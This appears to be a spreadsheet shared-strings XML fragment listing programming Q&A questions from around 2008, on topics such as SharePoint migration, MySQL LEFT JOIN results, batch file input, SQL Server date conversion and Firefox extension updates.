  <si>
    <t>Migrating from other Content Management Systems to SharePoint</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently working on a project which requires migration of content from different content management Systems to SharePoint. Are there any good, preferably open source, tools that would help me do this? Also, what are the best practices that I would have to keep in mind when it comes to such projects. One more thing that i would like to factor here is reusablity, because we might have to work on similar migration projects, from other Content Management systems in future. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>ActiveX plugin causes ASSERT to fail on application exit in VS2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My MFC application using the "ESRI MapObjects LT2" ActiveX plugin throws an ASSERT at me when closing it.
The error occurs in &lt;code&gt;cmdtarg.cpp&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CCmdTarget::~CCmdTarget()
{
#ifndef _AFX_NO_OLE_SUPPORT
    if (m_xDispatch.m_vtbl != 0)
    	((COleDispatchImpl*)&amp;amp;m_xDispatch)-&amp;gt;Disconnect();
    ASSERT(m_dwRef &amp;lt;= 1); //&amp;lt;--- Fails because m_dwRef is 3
#endif
    m_pModuleState = NULL;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I built the (native C++) application with VC9.
When I compile the application with VC6, it behaves nicely.&lt;/p&gt;
&lt;p&gt;What could be the reason for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL LEFT JOIN SELECT not selecting all the left side records?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm getting odd results from a &lt;code&gt;MySQL SELECT&lt;/code&gt; query involving a &lt;code&gt;LEFT JOIN&lt;/code&gt;, and I can't understand whether my understanding of &lt;code&gt;LEFT JOIN&lt;/code&gt; is wrong or whether I'm seeing a genuinely odd behavior.&lt;/p&gt;
&lt;p&gt;I have a two tables with a many-to-one relationship: For every record in &lt;code&gt;table 1&lt;/code&gt; there are 0 or more records in &lt;code&gt;table 2&lt;/code&gt;. I want to select all the records in table 1 with a column that counts the number of related records in table 2. As I understand it, &lt;code&gt;LEFT JOIN&lt;/code&gt; should always return all records on the &lt;code&gt;LEFT&lt;/code&gt; side of the statement.&lt;/p&gt;
&lt;p&gt;Here's a test database that exhibits the problem:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE DATABASE Test;
USE Test;
CREATE TABLE Dates (
   dateID INT UNSIGNED NOT NULL AUTO_INCREMENT,
   date DATE NOT NULL,
   UNIQUE KEY (dateID)
) TYPE=MyISAM;
CREATE TABLE Slots (
   slotID INT UNSIGNED NOT NULL AUTO_INCREMENT,
   dateID INT UNSIGNED NOT NULL,
   UNIQUE KEY (slotID)
) TYPE=MyISAM;
INSERT INTO Dates (date) VALUES ('2008-10-12'),('2008-10-13'),('2008-10-14');
INSERT INTO Slots (dateID) VALUES (3);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The Dates table has three records, and the Slots 1 - and that record points to the third record in Dates.&lt;/p&gt;
&lt;p&gt;If I do the following query..&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT d.date, count(s.slotID) FROM Dates AS d LEFT JOIN Slots AS s ON s.dateID=d.dateID GROUP BY s.dateID;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;..I expect to see a table with 3 rows in - two with a count of 0, and one with a count of 1. But what I actually see is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;+------------+-----------------+
| date       | count(s.slotID) |
+------------+-----------------+
| 2008-10-12 |               0 |
| 2008-10-14 |               1 |
+------------+-----------------+
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first record with a zero count appears, but the later record with a zero count is ignored. &lt;/p&gt;
&lt;p&gt;Am I doing something wrong, or do I just not understand what LEFT JOIN is supposed to do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DOS batch files: How to write to the prompt and stay in the same line to input text</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I like to know if there is a way to read the user input inside a batch file, because i have a file named: "fif.bat" that recives two parameters (just call them &lt;strong&gt;&lt;em&gt;paramA&lt;/em&gt;&lt;/strong&gt; and &lt;strong&gt;&lt;em&gt;paramB&lt;/em&gt;&lt;/strong&gt;) so i execute the file like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;fif paramA paramB
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have to change paramA every month, but i call this file lot of times so i like to open a console and have printed this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;fif paramA
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So i only have to write paramB and change paramA when i want it.&lt;/p&gt;
&lt;p&gt;PD: paramA is very large so it's very helpful if i can have it there instead of writing every time. And i don't want to make another batch file to call fif whit paramA.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>XML authoring/cms tool</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to find a good open source XML authoring tool so the work flow between the client and the developers will be a bit more streamlined.&lt;/p&gt;
&lt;p&gt;We are basically developing a lot of XML driven micro websites for various clients and products. And often the clients want to have a little content change here and there. Sometimes just to change an capital letter or very unspecific stuff. So they end up sending us an email with a word document containing their updates. And then we lose some time again to publish those updates. It's not a lot of effort, but it still has to be made.&lt;/p&gt;
&lt;p&gt;We were wondering, before making it ourselves, if there is a simple XML authoring/cms system out there. Where the developer could simply pick the editable fields/nodes and turn it to a simple but straightforward CMS for the client.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best pattern for simulating "continue" in Groovy closure</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It seems that Groovy does not support break and continue from within a closure. What is the best way to simulate this?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;revs.eachLine { line -&amp;gt; 
    if (line ==~ /-{28}/) {
            // continue to next line...
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Using Ext JS in ASP.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I donâ€™t have advanced knowledge in JavaScript, and I am trying to learn how to use Ext&amp;nbsp;JS framework in ASP.NET (C# or VB.NET) environment. Iâ€™ve got couple of samples, but was unable get the project working. Is there such as website or book so I can go a read up about Ext&amp;nbsp;JS in more details and how can I include this into my website?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any recommendations for tools for remote collaboration on Windows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The company I work for currently uses "Go To Meeting" to share our desktops but it's quite expensive for what we use it for and we are looking for cheaper (or even free) alternatives.&lt;/p&gt;
&lt;p&gt;We have evaluated yuuguu and yugma but they aren't up to scratch. They are both slow and only allow the sharers to share the entire desktop as opposed to individual applications. &lt;/p&gt;
&lt;p&gt;The functionality we need is to specify which application is shared and also to give the viewers permission to control the mouse and keyboard. Everything else would be an added bonus.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>windows automatic software updates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are some good solutions for handling automatic web based software updates for windows forms projects? I am aware of microsoft one-click, but am not interested in it at this time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Integrated Security for multiple domains?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to connect to a db with Integrated Security from multiple domains?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamically look up column names for a table while in an sql query</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing SQL (for Oracle) like:&lt;/p&gt;
&lt;pre&gt;
INSERT INTO Schema1.tableA SELECT * FROM Schema2.tableA;
&lt;/pre&gt;
&lt;p&gt;where Schema1.tableA and Schema2.tableA have the same columns. However, it seems like this is unsafe, since the order of the columns coming back in the SELECT is undefined. What I should be doing is:&lt;/p&gt;
&lt;pre&gt;
INSERT INTO Schema1.tableA (col1, col2, ... colN) 
SELECT (col1, col2, ... colN) FROM Schema2.tableA;
&lt;/pre&gt;
&lt;p&gt;I'm doing this for lots of tables using some scripts, so what I'd like to do is write something like:&lt;/p&gt;
&lt;pre&gt;
INSERT INTO Schema1.tableA (foo(Schema1.tableA)) 
SELECT (foo(Schema1.tableA)) FROM Schema2.tableA;
&lt;/pre&gt;
&lt;p&gt;Where foo is some nifty magic that extracts the column names from table one and packages them in the appropriate syntax. Thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any good team-chat websites?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any good team-chat websites, preferably in Python, ideally with CherryPy or Trac?&lt;/p&gt;
&lt;p&gt;This is similar to &lt;a href="http://stackoverflow.com/questions/46612/whats-a-good-freeware-collaborative-ie-multiuser-instant-messenger#46660"&gt;http://stackoverflow.com/questions/46612/whats-a-good-freeware-collaborative-ie-multiuser-instant-messenger#46660&lt;/a&gt;, but a few primary differences:&lt;/p&gt;
&lt;p&gt;1) I very much want to host the server.&lt;/p&gt;
&lt;p&gt;2) I don't care if Smileys are included or not in the client.&lt;/p&gt;
&lt;p&gt;3) I'd like two options for the users:&lt;br /&gt;
   a) Ability to host a private IRC like chat on my Trac page (or link to such a page),&lt;br /&gt;
   b) allow remote clients to also interact.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visio database diagrams, associating columns</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to be a good developer and create some documentation before I start programming my next project.&lt;/p&gt;
&lt;p&gt;I have created a database schema diagram in Visio and created relationships between columns.&lt;/p&gt;
&lt;p&gt;However, I am looking for a way to make the relationships between columns more clear.  I want the arrow to connect column to column.&lt;/p&gt;
&lt;p&gt;Is there a way to do this in Visio?&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.stack.imgur.com/sj0Bo.jpg" alt="http://i.stack.imgur.com/sj0Bo.jpg"&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I use the Twitter Search API to return all tweets that match my search query, posted only within the last five seconds?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to use the API to return all tweets that match my search query, but only tweets posted within the last five seconds.&lt;/p&gt;
&lt;p&gt;With Twitter's Search API, I can use the since_id to grab all tweets from a specific ID. However, I can't really see a good way to find the tweet ID to begin from.&lt;/p&gt;
&lt;p&gt;I'm also aware that you can use "since:" in the actual query to use a date, but you cannot enter a time.&lt;/p&gt;
&lt;p&gt;Can someone with Twitter API experience offer me any advice? Thanks for reading and your time!&lt;/p&gt;
&lt;p&gt;&lt;a href="http://apiwiki.twitter.com/Search-API-Documentation"&gt;http://apiwiki.twitter.com/Search-API-Documentation&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Well explained algorithms for indexing and searching in metric spaces</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to implement some kind of metric space search in Postgres(*) (PL or PL/Python). So, I'm looking for good sources (or papers) with a very clear and crisp explanation of the machinery behind these ideas, in such way that I can implement it myself.&lt;/p&gt;
&lt;p&gt;I would prefer clarity over efficiency.&lt;/p&gt;
&lt;p&gt;(*) The need for that is described better &lt;a href="http://stackoverflow.com/questions/122990/how-to-determine-if-a-record-in-every-source-represents-the-same-person"&gt;here&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I distinguish a file from a directory in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to traverse through all the subdirectories of the current directory in Perl, and get data from those files. I'm using grep to get a list of all files and folders in the given directory, but I don't know which of the values returned is a folder name and which is a file with no file extention. &lt;/p&gt;
&lt;p&gt;How can I tell the difference? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Start program on a second monitor?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to specify which monitor a application appears on in Delphi or C++Builder?  &lt;/p&gt;
&lt;p&gt;I am developing a simple program for a customer, which displays kitchen orders on a secondary monitor, generated by a hospitality system.  Currently they need to manually drag the window onto the second monitor after it starts.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When does the standard 404 page appear?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building a simple HTTP server for a project.
Most websites have custom 404 error pages. Sometimes though, you'll see Firefox spitting a generic 404 page (or 405, etc...).
How does it decide what to do?
What should the HTTP response be?
Is "HTTP/1.0 404 NOT FOUND" enough?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to check when a specified date occurs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any classes in the .NET framework I can use to throw an event if time has caught up with a specified DateTime object?&lt;/p&gt;
&lt;p&gt;If there isn't, what are the best practices when checking this? Create a new thread constantly checking? A timer (heaven forbid ;) )?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Index varchar on MS SQL Server 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to index a varchar field on my table in MS SQL Server 2005, but it's not clear to me how to do so.  If I try to add a non-clustered index on the field, it says "Column 'xxxx' in table 'mytable' is of a type that is invalid for use as a key column in an index"&lt;/p&gt;
&lt;p&gt;My table has an auto-increment int ID that is set as the primary key on the table.  If I set this property as the index, and then add my varchar column as an "included column", the index goes through.  But I'm not sure that's what I want - I want to be able to search the table based on the varchar field alone, and my understanding of indexes was that all indexed elements had to be provided to actually see a speedup in the query, but I don't want to have to included the int ID (because I don't know what it is, at the time of this given query).&lt;/p&gt;
&lt;p&gt;Am I trying to do this incorrectly? Would the ID + my varchar as an included column accomplish what I am looking for?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>TCP connection quality in .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a mission-critical real-time data application that uses a TCP connection between the client and server. In some cases, the connection periodically dies (SocketException). No problem - just reconnect and move on. However, the customers aren't thrilled with these intermittent drops in connectivity.&lt;/p&gt;
&lt;p&gt;I'd like to know where to point the finger. Is it the client or server? Hardware or software? Is it something about the ethernet link? The end result would be to show the user an indicator of connection health, so that a bad link can be investigated and remedied.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Are there any metrics I can pull from the TcpClient, Socket, or anything else that will tell me about the health of the connection?&lt;/strong&gt; Perhaps average time to ack, number of retries, etc?&lt;/p&gt;
&lt;p&gt;I specifically want to know about a TCP connection - not just the ethernet connection as a whole (your LAN connection might be dandy, but there could be an issue going to an outside server).&lt;/p&gt;
&lt;p&gt;Of course I could ping the remote host, but I don't think that would really give me the kind of stats I'm looking for. For one thing, I could be pinging a router if the server is hiding behind NAT.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SetLimitText() in a CEdit in Vista does not work</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is happening on Vista.
I created a new dialog based MFC project to test this. I added a CEdit control to my dialog. I called SetLimitText to let my CEdit receive 100000 characters. I tried both:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;this-&amp;gt;m_cedit1.SetLimitText(100000);
UpdateData(FALSE);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static_cast&amp;lt;CEdit*&amp;gt;(GetDlgItem(IDC_EDIT1))-&amp;gt;LimitText(100000);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I placed these calls on InitDialog.&lt;/p&gt;
&lt;p&gt;after I paste 5461 characters into my CEdit, it becomes empty and unresponsive. Any ideas as to what is causing this and workarounds to be able to paste long strings of text in a CEdit or any other control?&lt;/p&gt;
&lt;p&gt;note: 5461 is 0x1555 or 1010101010101 in binary, which i find quite odd.&lt;/p&gt;
&lt;p&gt;if I paste 5460 characters I have no problems.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I center content between a header and footer div?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a previous question, I learned how to keep a footer div at the bottom of the page. (&lt;a href="http://stackoverflow.com/questions/206652/how-to-create-div-to-fill-all-space-between-header-and-footer-div"&gt;see other question&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;Now I'm trying to vertically center content between the header and footer divs.&lt;/p&gt;
&lt;p&gt;so what I've got is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#divHeader
{
    height: 50px;
}
#divContent
{
    position:absolute;
}
#divFooter
{
    height: 50px;
    position:absolute;
    bottom:0;
    width:100%;
}
&amp;lt;div id="divHeader"&amp;gt;
    Header
&amp;lt;/div&amp;gt;
&amp;lt;div id="divContent"&amp;gt;
    Content
&amp;lt;/div&amp;gt;
&amp;lt;div id="divFooter"&amp;gt;
    Footer
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried creating a parent div to house the existing 3 divs and giving that div a vertical-align:middle; but that gets me nowhere.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best JavaScript Date Parser &amp; Formatter?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Since I've started to use jQuery, I have been doing a lot more JavaScript development.&lt;/p&gt;
&lt;p&gt;I have the need to parse different date formats and then to display them into another format.&lt;/p&gt;
&lt;p&gt;Do you know of any good tool to do this?&lt;/p&gt;
&lt;p&gt;Which one would you recommend?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I prevent and/or handle a StackOverflowException?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to either prevent or handle a StackOverflowException that I am getting from a call to the XslCompiledTransform.Transform method within an Xsl Editor I am writing. The problem seems to be that the user can write an Xsl script that is infinitely recursive, and it just blows up on the call to the Transform method.  (That is, the problem is not just the typical programmatic error, which is usually the cause of such an exception.)&lt;/p&gt;
&lt;p&gt;Is there a way to detect and/or limit how many recursions are allowed?  Or any other ideas to keep this code from just blowing up on me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Printing to a client printer from a web app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I have a printer hooked directly to a pc (a kiosk with a printer), how would I go about creating the ability for a web page (.net web app) to print a jpg to the kiosks printer with no user intervention other than clicking a button on the page?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Defining SLAs for WCF Services</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to performance/load test a bunch of interdependant services.  They all use net.tcp and most use duplex contracts and internal queueing.  [handrolled POCO queue class using lock(syncRoot) { if(queue.Empty) Thread.Wait(); }]&lt;/p&gt;
&lt;p&gt;Here's the approach I've come up with:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Identify WCF Services to be performance tested&lt;/li&gt;
&lt;li&gt;Identify the relavant Performance counters for each of the Services&lt;/li&gt;
&lt;li&gt;Identify the logical startpoint that would take the execution through the services being tested&lt;/li&gt;
&lt;li&gt;Auto Generate Unit Tests using VS.Net for each of the services&lt;/li&gt;
&lt;li&gt;Write specific Functional Tests (For example, I can take a use case - "Place an Order" - and write tests that make all the calls to the relevant services and generally excercise pretty much all the functionality needed)&lt;/li&gt;
&lt;li&gt;Use the trace files from running #5 to generate Unit Tests [using WCF Load Test from CodePlex] (This somehow seems to me an ideal tool for recreating user errors in production/field in a debug environment.  Disclaimer: Not used the tool.  Impressions from reading the project desc)&lt;/li&gt;
&lt;li&gt;The tests above could be tweaked to make the calls with auto generated input data&lt;/li&gt;
&lt;li&gt;Introduce variations to input so different code paths are excercised&lt;/li&gt;
&lt;li&gt;Log data from performance counters&lt;/li&gt;
&lt;li&gt;Analyze and identify bottlenecks&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Is there a better approach?&lt;/li&gt;
&lt;li&gt;In case of services that use internal queues, measuring performance using std performance counters, an issue.  I may need custom counters?&lt;/li&gt;
&lt;li&gt;If #1 is true, is there a way to introduce customer counters without changing code of the services being tested?&lt;/li&gt;
&lt;li&gt;Should I care about the results of my functional tests?&lt;/li&gt;
&lt;li&gt;Is there a way to [non-intrusively] implement SLAs for WCF services?  (I think if I have enough data from my counters such as requests served, exceptions occurred , response time etc., I should be able to validate my SLA - serve 200,000 requests within 5 mins with a response time of 2 seconds for each request - against these figures.  My question perhaps is whether I can just specify my SLA and a product / tool could do all of the plumbing behind the scene and get me a tabulated answer?  I know... I know... I was day dreaming :))&lt;/li&gt;
&lt;li&gt;Aside: What's the best method to queue requests internally in a WCF Service?&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Exporting dataset to excel error: Exception from HRESULT: 0x800A03EC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having trouble in exporting to excel and it crashes out at the .set_Value function.&lt;/p&gt;
&lt;p&gt;It seems to work if I change object[,] to string[,] but by doing this I lose the formatting.&lt;/p&gt;
&lt;p&gt;Anyone Help?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Way To Store Multiple Flags In Database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web-based application that notifies users of activity on the site via email. Users can choose which kinds of notifcations they want to receive. So far there are about 10 different options (each one is a true/false).&lt;/p&gt;
&lt;p&gt;I'm currently storing this in one varchar field as a 0 or 1 separated by commas. For example:
1,0,0,0,1,1,1,1,0,0&lt;/p&gt;
&lt;p&gt;This works but it's difficult to add new notification flags and keep track of which flag belongs to which notification. Is there an accepted standard for doing this? I was thinking of adding another table with a column for each notification type. Then I can add new columns if I need, but I'm not sure how efficient this is.&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python: Difference between class and instance attributes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any meaningful distinction between:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class A(object):
    foo = 5   # some default value
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;vs.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class B(object):
    def __init__(self, foo=5):
        self.foo = foo
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you're creating a lot of instances, is there any difference in performance or space requirements for the two styles? When you read the code, do you consider the meaning of the two styles to be significantly different?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stripes: all URLs resolved through StripesDispatcher and forwarded to pre-compiled JSPs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to have the StripesDispatcher be the sole determiner of webserver urls by looking at the @UrlBinding annotations on action beans AND also having those action beans forward to pre-compiled JSPs / servlets WITHOUT needing to define and maintain &amp;lt;servlet&amp;gt; &amp;lt;servlet-mapping&amp;gt; pairs in web.xml? Basically, I just want to have to only maintain the @UrlBinding annotations as the sole determiners of available webapp paths.&lt;/p&gt;
&lt;p&gt;Perhaps there is a way to point Jasper to where my servlets are and load them all up automatically without having to explicitly define each and every one?&lt;/p&gt;
&lt;p&gt;The particular way in which this is achieved is not important, only that I leave the land of explicit servlet web.xml dependencies.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Setting the Body's OnLoad attribute in an Asp.net MVC Master Page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a view using a master page that contains some javascript that needs to be executed using the OnLoad of the Body. What is the best way to set the OnLoad on my MasterPage only for certain views?&lt;/p&gt;
&lt;p&gt;On idea I tried was to pass the name of the javascript function as ViewData. But I dont really want my Controllers to have to know about the javascript on the page. I really don't like this approach...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;body onload="&amp;lt;%=ViewData["Body_OnLoad"]%&amp;gt;"&amp;gt;
&amp;lt;asp:ContentPlaceHolder ID="MainContent" runat="server" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Edit - I suppose one idea would be to use jQuery's document ready event instead...&lt;/p&gt;
&lt;p&gt;Any other ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sql Server string to date conversion</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to convert a string like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;'10/15/2008 10:06:32 PM'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;into the equivalent DATETIME value in Sql Server.&lt;/p&gt;
&lt;p&gt;In Oracle, I would say this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TO_DATE('10/15/2008 10:06:32 PM','MM/DD/YYYY HH:MI:SS AM')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/202243/custom-datetime-formatting-in-sql-server"&gt;This question&lt;/a&gt; implies that I must parse the string into one of the &lt;a href="http://www.sql-server-helper.com/tips/date-formats.aspx" rel="nofollow"&gt;standard formats&lt;/a&gt;, and then convert using one of those codes.  That seems ludicrous for such a mundane operation.  Is there an easier way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hooking up GUI interface with asynchronous (s)ftp operation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Trying to implement a progress dialog window for file uploads that look like a cross between &lt;a href="http://www.codinghorror.com/blog/images/ie6-download-ui.png" rel="nofollow"&gt;IE download dialog&lt;/a&gt; and &lt;a href="http://www.codinghorror.com/blog/images/firefox2-download-ui.png" rel="nofollow"&gt;Firefox download dialog&lt;/a&gt; with a python GUI library on Windows.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;What asynchronous (S)FTP libraries are there for python? Ideally I should be able to do file upload resumes and track the progress of each parallel file uploads.&lt;/li&gt;
&lt;li&gt;If I'm running each file upload in a separate process each, how would I get the upload status and display it in a progress bar dialog?&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>firefox 3 favicons - how to make them?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i noticed that paypal displays a very different favicon,
one that's not just a simple 16x16 icon and is lengthy?
anyone can teach me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>extracting a parenthesized Python expression from a string</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been wondering about how hard it would be to write some Python code to search a string for the index of a substring of the form &lt;code&gt;${&lt;/code&gt;&lt;em&gt;expr&lt;/em&gt;&lt;code&gt;}&lt;/code&gt;, for example, where &lt;em&gt;expr&lt;/em&gt; is meant to be a Python expression or something resembling one.  Given such a thing, one could easily imagine going on to check the expression's syntax with &lt;code&gt;compile()&lt;/code&gt;, evaluate it against a particular scope with &lt;code&gt;eval()&lt;/code&gt;, and perhaps even substitute the result into the original string.  People must do very similar things all the time.&lt;/p&gt;
&lt;p&gt;I could imagine solving such a problem using a third-party parser generator [oof], or by hand-coding some sort of state machine [eek], or perhaps by convincing Python's own parser to do the heavy lifting somehow [hmm].  Maybe there's a third-party templating library somewhere that can be made to do exactly this.  Maybe restricting the syntax of &lt;em&gt;expr&lt;/em&gt; is likely to be a worthwhile compromise in terms of simplicity or execution time or cutting down on external dependencies -- for example, maybe all I really need is something that matches any &lt;em&gt;expr&lt;/em&gt; that has balanced curly braces.&lt;/p&gt;
&lt;p&gt;What's your sense?&lt;/p&gt;
&lt;h2&gt;Update:&lt;/h2&gt;
&lt;p&gt;Thanks very much for your responses so far!  Looking back at what I wrote yesterday, I'm not sure I was sufficiently clear about what I'm asking.  Template substitution is indeed an interesting problem, and probably much more useful to many more people than the expression extraction subproblem I'm wondering about, but I brought it up only as a simple example of how the answer to my question might be useful in real life.  Some other potential applications might include passing the extracted expressions to a syntax highlighter; passing the result to a real Python parser and looking at or monkeying with the parse tree; or using the sequence of extracted expressions to build up a larger Python program, perhaps in conjunction with some information taken from the surrounding text.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;${&lt;/code&gt;&lt;em&gt;expr&lt;/em&gt;&lt;code&gt;}&lt;/code&gt; syntax I mentioned is also intended as an example, and in fact I wonder if I shouldn't have used &lt;code&gt;$(&lt;/code&gt;&lt;em&gt;expr&lt;/em&gt;&lt;code&gt;)&lt;/code&gt; as my example instead, because it makes the potential drawbacks of the obvious approach, along the lines of &lt;code&gt;re.finditer(r'$\{([^}]+)\}', s)&lt;/code&gt;, a bit easier to see.  Python expressions can (and often do) contain the &lt;code&gt;)&lt;/code&gt; (or &lt;code&gt;}&lt;/code&gt;) character.  It seems possible that handling any of those cases might be much more trouble than it's worth, but I'm not convinced of that yet.  Please feel free to try to make this case!&lt;/p&gt;
&lt;p&gt;Prior to posting this question, I spent quite a bit of time looking at Python template engines hoping that one might expose the sort of low-level functionality I'm asking about -- namely, something that can find expressions in a variety of contexts and tell me where they are rather than being limited to finding expressions embedded using a single hard-coded syntax, always evaluating them, and always substituting the results back into the original string.  I haven't figured out how to use any of them to solve my problem yet, but I do very much appreciate the suggestions regarding more to look at (can't believe I missed that wonderful list on the wiki!).  The API documentation for these things tends to be pretty high-level, and I'm not too familiar with the internals of any of them, so I'm sure I could use help looking at those and figuring out how to get them to do this sort of thing.&lt;/p&gt;
&lt;p&gt;Thanks for your patience!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do ASP.NET applications work when deployed without the code-behind files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When you deploy an application to IIS without all files that contains code (VB/C#) then 
how exactly are events &amp;amp; all things handled?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Updated Firefox Extension - Still says "No updates were found."</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a new version of a firefox extension, but after releasing it, and incrementing the em:version in install.rdf and update.rdf, when I click "Find updates" Firefox reports that "No updates were found."  When I run it with debugging on, the output in the console is actually identical to what I see when I don't put the update live.  &lt;/p&gt;
&lt;p&gt;It starts with RDFItemUpdater:checkForUpdates with all of the parameters, and returns with Addon Update Ended and status: 8.&lt;/p&gt;
